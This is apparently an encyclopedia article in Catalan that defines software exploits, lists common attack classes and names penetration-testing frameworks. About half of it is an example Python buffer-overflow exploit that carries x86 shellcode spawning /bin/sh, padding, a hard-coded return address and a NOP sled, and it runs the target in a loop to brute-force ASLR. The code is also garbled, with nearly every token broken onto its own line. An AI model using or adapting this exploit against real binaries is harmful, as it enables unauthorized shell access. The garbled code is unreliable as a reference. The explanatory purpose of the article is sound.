# Exploit
Exploit o explotador (de l'anglès to exploit, explotar o aprofitar) és una peça de programari, un fragment de dades o una seqüència d'ordres per tal d'automatitzar l'aprofitament d'un error, fallada o vulnerabilitat, causar un comportament no desitjat o imprevist en els programes informàtics, maquinari, o component electrònic (en general computat). Sovint, això inclou coses com ara la violenta presa de control d'un sistema de còmput o permetre l'escalada de privilegis o un atac de denegació de servei.
L'objectiu de l'exploit pot ser violar les mesures de seguretat per accedir-hi de forma no autoritzada i emprar en benefici propi o com a origen d'altres atacs a tercers.
Els exploits poden ser escrits emprant una diversitat de llenguatges de programació, tot i que majoritàriament se sol utilitzar llenguatge C. També pot aprofitar-se de diferents tipus d'atacs com ara desbordament de memòria intermèdia, Cross Site Scripting, Format Strings, Injecció SQL, entre d'altres.
Un exemple d'un exploit, que s'aprofita d'un desbordament de memòria intermèdia escrit en llenguatge Python seria:
```
#!/usr/bin/env python

import
 
os

import
 
sys

import
 
time

class
 
Exploit
:

 
def
 
__init__
(
self
):

 
if
 
len
(
sys
.
argv
)
 
<>
 
2
:

 
print
 
"
\n
[*] Usage: python exploit.py /path/binary
\n
"

 
exit
()
 
 
else
:

 
self
.
arg2
=
sys
.
argv
[
1
]

 
# Command=/bin/sh Size=24 bytes Bind=No 

 
self
.
shellcode
 
=
 
(
"
\x99\x31\xc0\x52\x68\x6e\x2f\x73
"

 
"
\x68\x68\x2f\x2f\x62\x69\x89\xe3
"

 
"
\x52\x53\x89\xe1\xb0\x0b\xcd\x80
"
)
 

 
self
.
payload
 
=
 
'
\x41
'
*
1036
 
# Padding 0x41 (A) 

 
self
.
payload
 
+=
 
'
\x70\x9b\x80\xbf
'
 
# Magic Address -> 0xbf809b70

 
self
.
payload
 
+=
 
'
\x90
'
*
10000
 
# 0x90 (NOP) x 10000

 
# The ASLR begin at the memory address 0xbf80010#i1

 
def
 
loop
(
self
):

 
print
 
"
\n
[+] Starting Explotation...
\n
"

 
time
.
sleep
(
2
)

 
while
 
True
:

 
os
.
system
(
self
.
arg2
 
+
 
' '
 
+
 
self
.
payload
 
+
 
self
.
shellcode
)

"""Start execution"""

if
 
__name__
 
==
 
'__main__'
:

 
union
=
Exploit
()
 
 
conector
=
union
.
loop
()

exit
()

```

Una de les eines més utilitzades per treballar amb aquest tipus de programari és  Metasploit Framework, una plataforma de test de penetració escrita en llenguatge de programació Ruby, com així també altres frameworks com Core Impact, Canvas, entre d'altres.